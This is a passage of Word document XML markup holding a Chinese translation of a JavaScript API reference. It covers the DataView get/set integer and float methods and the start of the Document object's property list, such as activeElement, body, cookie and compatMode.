        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>short getInt16(u</w:t>
      </w:r>
      <w:r>
        <w:t>nsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的两个字节解释为一个有符号整数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long getInt32(unsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节解释为一个有符号整数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>byte getInt8(unsigned long byteOffset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将位于</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>的字节解释为一个有符号整数并返回这</w:t>
      </w:r>
      <w:r>
        <w:t>个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short getUint16(unsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>开始的两个字节解释为一个无符号整数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long getUint32(unsigned long byteOffset,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将从</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>处开始的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节解释为一个无符号整数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">unsigned byte </w:t>
      </w:r>
      <w:r>
        <w:t>getUint8(unsigned long byteOffset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将位于</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>处的字节解释为一个无符号整数并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setFloat32(unsigned long byteOffset,float value,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>字节的浮点数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void setFloat64(unsigned long byteOffset,double value,[boolean </w:t>
      </w:r>
      <w:r>
        <w:t>littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>字节的浮点数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setInt16(unsigned long byteOffset,short value,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>字节的整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setInt32(unsigned long byteOffset,long value,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>字节的整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setInt8(unsigned long byteOffset,byte value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>字节的整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setUint16(unsigned long byteOffset,unsigned short value,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>字节的无符号整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void setU</w:t>
      </w:r>
      <w:r>
        <w:t>int32(unsigned long byteOffset,unsigned long value,[boolean littleEndian])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>字节的无符号整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setUint8(unsigned long byteOffset,octet value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>字节的无符号整数并将对应字节在</w:t>
      </w:r>
      <w:r>
        <w:t>byteOffset</w:t>
      </w:r>
      <w:r>
        <w:t>位置写入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="808" w:name="Document"/>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象是文档树的根节点</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性是文档的根元素。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点可以有其他子节点（比如</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点），不过它只有一个保存文档所有内容的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>子节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数情况下获取一个</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法是通过窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>contentDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性或任意节点的</w:t>
      </w:r>
      <w:r>
        <w:t>ownerDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的大多数属性提供了对文档元素或其他与文档相关的重要对象的访问，一些</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>方法做同样的事：提供一个方法在文档树中查找元素。许多其他</w:t>
      </w:r>
      <w:r>
        <w:t>Docuemnt</w:t>
      </w:r>
      <w:r>
        <w:t>方法是创建元素及相关对象的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>工厂方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和包含的元素一样，文档也可以是事件的目标对象。它实现</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>定义的方法，也支持不少事件处理程序属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>DOMImplementation</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>createDocument()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>createHTMLDocument()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来生成一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.implementation.createHTMLDocument("New Doc");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也可以从网络上下载一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文件并将它解析为</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。参见</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书之前的版本中关于</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>的参考已经合并到这儿了。注意，这儿列举的一些属性、方法及事件处理程序是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>特有的，在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档下不能工作。</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除这儿列出的属性外，也可以使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞及＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值作为文档属性，这些属性的值是对应名字的元素（</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>）或节点列表（</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>）。但是，对命名的＜</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>rame</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来说，这个属性指代＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element activeElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前获得键盘焦点的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来说，这个元素指代＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。（对定义了窗体集的元素，这个属性指代的是最外层的＜</w:t>
      </w:r>
      <w:r>
        <w:t>frameset</w:t>
      </w:r>
      <w:r>
        <w:t>＞。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string characterSet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档的字符编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string charset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档的字符编码。它和</w:t>
      </w:r>
      <w:r>
        <w:t>character Set</w:t>
      </w:r>
      <w:r>
        <w:t>类似，不过可以</w:t>
      </w:r>
      <w:r>
        <w:t>通过设置它来改变文档编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string compatMode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果文档为了兼容非常老的浏览器，使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS“</w:t>
      </w:r>
      <w:r>
        <w:t>怪异模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>quirks mode</w:t>
      </w:r>
      <w:r>
        <w:t>）渲染，则这个属性的值为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"BackCompat"</w:t>
      </w:r>
      <w:r>
        <w:t>。在其他情况下，这个属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"CSS1Compat"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性允许读、新建、修改或删除当前文档应用的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器保存的少量的命名数据，它让浏览器有了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>记忆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，这样浏览器就能在一个页面输入数据并在另一个页面使用，或者通过</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览会话调出用户</w:t>
      </w:r>
      <w:r>
        <w:t>的偏好。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据在适当的时候会自动在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器与</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器之间传送，这样服务端的脚本就可以读写</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值。客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码也可以通过这个属性来读写</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，这是一个可读写的属性，但是从其中读出的值通常情况下与写的值并不完全一样。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>20.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string defaultCharset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器的默认字符集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window defaultView</w:t>
      </w:r>
    </w:p>
